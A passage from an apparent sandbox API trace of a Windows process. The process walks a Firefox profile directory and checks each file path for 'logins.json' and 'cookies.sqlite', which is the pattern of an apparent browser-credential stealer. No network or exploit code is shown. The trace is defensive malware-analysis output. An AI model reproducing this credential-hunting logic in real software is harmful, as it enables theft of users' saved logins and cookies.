RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255b0 | out: hHeap=0x8e0000) returned 1 [0160.844] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="idb", cAlternateFileName="")) returned 0 [0160.844] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0160.845] VirtualQuery (in: lpAddress=0x9253b8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9253b8 | out: hHeap=0x8e0000) returned 1 [0160.845] VirtualQuery (in: lpAddress=0x924e70, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e70 | out: hHeap=0x8e0000) returned 1 [0160.845] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0160.845] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.845] lstrlenW (lpString="\\") returned 1 [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x924e70 [0160.845] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0160.845] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0160.845] lstrlenW (lpString="moz-safe-about+home") returned 19 [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x9252c0 [0160.845] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0160.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.845] VirtualQuery (in: lpAddress=0x924e70, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e70 | out: hHeap=0x8e0000) returned 1 [0160.845] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="logins.json") returned 0x0 [0160.845] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="cookies.sqlite") returned 0x0 [0160.845] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.845] GetProcessHeap () returned 0x8e0000 [0160.845] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0160.845] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0160.846] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0160.846] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.846] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.846] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.846] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.846] lstrlenW (lpString="\\") returned 1 [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.846] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.846] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.846] lstrlenW (lpString="indexedDB") returned 9 [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x926420 [0160.846] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.846] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.846] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="logins.json") returned 0x0 [0160.846] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="cookies.sqlite") returned 0x0 [0160.846] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.846] GetProcessHeap () returned 0x8e0000 [0160.846] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.846] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0160.846] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.847] lstrlenW (lpString="\\") returned 1 [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.847] lstrlenW (lpString="key3.db") returned 7 [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x926420 [0160.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" [0160.847] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.847] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="logins.json") returned 0x0 [0160.847] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="cookies.sqlite") returned 0x0 [0160.847] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.847] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x850d63f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x501, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="localstore.rdf", cAlternateFileName="LOCALS~1.RDF")) returned 1 [0160.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.847] lstrlenW (lpString="\\") returned 1 [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.847] lstrlenW (lpString="localstore.rdf") returned 14 [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0160.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" [0160.847] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.847] GetProcessHeap () returned 0x8e0000 [0160.847] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.848] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="logins.json") returned 0x0 [0160.848] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="cookies.sqlite") returned 0x0 [0160.848] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.848] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x85572e90, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="marionette.log", cAlternateFileName="MARION~1.LOG")) returned 1 [0160.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.848] lstrlenW (lpString="\\") returned 1 [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.848] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.848] lstrlenW (lpString="marionette.log") returned 14 [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0160.848] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" [0160.848] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.848] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="logins.json") returned 0x0 [0160.848] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="cookies.sqlite") returned 0x0 [0160.848] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.848] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb5175550, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xef3, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="mimeTypes.rdf", cAlternateFileName="MIMETY~1.RDF")) returned 1 [0160.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.848] lstrlenW (lpString="\\") returned 1 [0160.848] GetProcessHeap () returned 0x8e0000 [0160.848] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.848] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.849] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.849] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 